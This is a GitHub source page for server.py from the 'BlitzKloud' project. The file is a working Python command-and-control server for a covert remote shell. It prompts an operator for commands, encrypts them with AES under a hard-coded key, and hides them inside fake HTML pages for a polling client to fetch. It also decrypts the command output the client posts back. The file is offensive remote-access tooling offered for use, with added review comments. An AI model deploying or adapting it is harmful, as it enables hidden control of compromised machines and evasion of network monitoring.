-
Notifications
You must be signed in to change notification settings - Fork 4
/
Copy pathserver.py
151 lines (124 loc) · 4.02 KB
/
server.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
#!/usr/bin/env python3
# BlitzKloud Server - https://github.com/darkerego/blitzkloud
# darkerego, 2019 ~ xelectron@protonmail.com
import pyaes
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from time import sleep
from sys import stdin, argv
# from termios import tcgetattr, TCSADRAIN
# from tty import setraw, tcsetattr
# Shared AES key used by enc() and denc(). It is written as a bytes literal
# because the cipher is handed the key as bytes; the literal is 32 bytes long,
# i.e. a 256-bit key.
# NOTE(review): hard-coded demo value -- presumably the client has to use the
# same key; confirm, and replace it before any real use.
key = b"This_key_for_demo_purposes_only!"
def enc(data):
    """
    ENCRYPTION
    AES CTR mode - 256 bit (32 byte) key
    :param data: data to encrypt (str or bytes); a str is encoded as UTF-8
    :return: base64 encoded AES ciphertext, as a str
    """
    # Encode text explicitly. Handing a str to pyaes makes it map every
    # character with ord(), which fails for code points above 255 and yields
    # Latin-1 bytes for 128-255 -- neither matches the UTF-8 decode in denc().
    if isinstance(data, str):
        data = data.encode('utf-8')
    # NOTE(review): a fresh CTR instance is built for every call without an
    # explicit counter, so each message is encrypted with the same keystream
    # under the fixed key. Changing that needs a matching client change, so it
    # is only flagged here.
    aes = pyaes.AESModeOfOperationCTR(key)
    ciphertext = aes.encrypt(data)
    return base64.b64encode(ciphertext).decode()
def denc(data):
    """
    DECRYPTION
    Reverse of enc(): base64-decode, AES CTR decrypt, then UTF-8 decode.
    A new cipher instance is created for every call.
    :param data: base64 encoded ciphertext
    :return: plaintext (str)
    """
    raw_ciphertext = base64.b64decode(data)
    cipher = pyaes.AESModeOfOperationCTR(key)
    # the cipher yields bytes; turn them back into text
    plaintext_bytes = cipher.decrypt(raw_ciphertext)
    return plaintext_bytes.decode('utf-8')
# Commands typed at the server prompt, in entry order. ShellServer.do_GET
# appends to this list and prints it when the operator answers 'c' after Ctrl-C.
command_history = []
class ShellServer(BaseHTTPRequestHandler):
    """
    HTTP handler that carries an operator shell session over GET and POST.

    GET:  block on the operator prompt, encrypt the typed command and send it
          back wrapped in a small HTML page.
    POST: read the request body, remove the optional HTML wrapper, decrypt the
          payload and print it.
    """

    # Markup placed around every encrypted payload so the traffic looks like
    # an ordinary web page.
    _HTML_PREFIX = '<html><body><h1>'
    _HTML_SUFFIX = '</h1></body></html>'

    def _set_headers(self):
        """Send a 200 status line and a text/html Content-type header."""
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    @classmethod
    def _unwrap_payload(cls, raw):
        """
        Turn a raw POST body into the bare base64 payload.

        :param raw: request body as bytes
        :return: payload text with the HTML wrapper (if present) and any
                 surrounding whitespace removed
        """
        # base64 is pure ASCII, so any other byte cannot be part of the payload.
        text = raw.decode('ascii', errors='ignore').strip()
        # Remove the wrapper as an exact prefix/suffix. str.strip(chars) treats
        # its argument as a set of characters, which would leave the tags in
        # place or eat payload characters.
        if text.startswith(cls._HTML_PREFIX):
            text = text[len(cls._HTML_PREFIX):]
        if text.endswith(cls._HTML_SUFFIX):
            text = text[:-len(cls._HTML_SUFFIX)]
        return text.strip()

    def _on_interrupt(self):
        """
        Handle Ctrl-C at the command prompt.

        'y' exits the process, 'r' prints the restart message, 'c' prints the
        command history, anything else keeps waiting for the next request.
        :return: False for 'r', otherwise None
        """
        choice = input('Quit? (y/n/r/c)')
        if choice == 'y':
            # SystemExit is not an Exception subclass, so it is not swallowed
            # by the server's per-request error handling.
            raise SystemExit(0)
        if choice == 'r':
            print('Restarting server ...')
            # NOTE(review): http.server does not act on the value returned by
            # a do_* method, so this does not make serve_forever() return.
            return False
        if choice == 'c':
            print('Command history: ')
            for cmd in command_history:
                print(cmd)
            return None
        print('Waiting for reconnection ...')
        return None

    def do_GET(self):
        """
        Answer a client poll with the next operator command.

        The response headers are sent first, then the method blocks until the
        operator enters a command (or presses Ctrl-C).
        """
        self._set_headers()
        try:
            command = input('$ ')
        except KeyboardInterrupt:
            return self._on_interrupt()
        command_history.append(command)
        page = self._HTML_PREFIX + enc(command) + self._HTML_SUFFIX
        try:
            self.wfile.write(page.encode())
        except BrokenPipeError:
            # The client went away while the prompt was waiting for input.
            print('Broken Pipe, wait for reconnection ... ')

    def do_HEAD(self):
        """Reply with headers only."""
        self._set_headers()

    def do_POST(self):
        """Read an encrypted result from the client, decrypt it and print it."""
        self._set_headers()
        # A request without a Content-Length header is treated as an empty body.
        content_length = int(self.headers.get('Content-Length') or 0)
        payload = self._unwrap_payload(self.rfile.read(content_length))
        try:
            result = denc(payload)
        except ValueError as err:
            # Invalid base64 (binascii.Error) and undecodable plaintext
            # (UnicodeDecodeError) are both ValueError subclasses.
            print('Could not decrypt client data: %s' % err)
            return
        print(result)

    def log_message(self, format, *args):
        """Silence the default per-request log line."""
        return
"""class _Getch: # History scrolling not yet implemented
# TODO: implement scrolling of command history OR full PTY shell
def __call__(self):
fd = stdin.fileno()
old_settings = tcgetattr(fd)
try:
setraw(stdin.fileno())
ch = stdin.read(3)
finally:
tcsetattr(fd, TCSADRAIN, old_settings)
return ch
def scroll():
# TODO: implement OR use a real PTY shell
inkey = _Getch()
while(1):
k = inkey()
if k != '':break
if k == '\x1b[A':
print("up")
elif k == '\x1b[B':
print("down")
else:
pass"""
def run(server_class=HTTPServer, handler_class=ShellServer, port=80):
    """
    Bind the HTTP server on all interfaces and serve requests.

    :param server_class: server type to instantiate (HTTPServer compatible)
    :param handler_class: request handler class handed to the server
    :param port: TCP port to listen on
    """
    server_address = ('0.0.0.0', port)
    httpd = server_class(server_address, handler_class)
    # Format host and port separately; passing the whole address tuple to %s
    # printed "('0.0.0.0', 8880):8880".
    print('Starting httpd on %s:%d...' % (server_address[0], port))
    try:
        while True:
            # serve_forever() only returns once shutdown() has been called on
            # the server; in that case start serving again after a pause.
            httpd.serve_forever()
            print('Restarting server ... ')
            sleep(1)
    finally:
        # Release the listening socket when the loop is left by an exception
        # (Ctrl-C, SystemExit, ...).
        httpd.server_close()
if __name__ == "__main__":
    # Usage: server.py [port] -- with exactly one argument it is the listen
    # port, otherwise the server listens on 8880.
    listen_port = int(argv[1]) if len(argv) == 2 else 8880
    run(port=listen_port)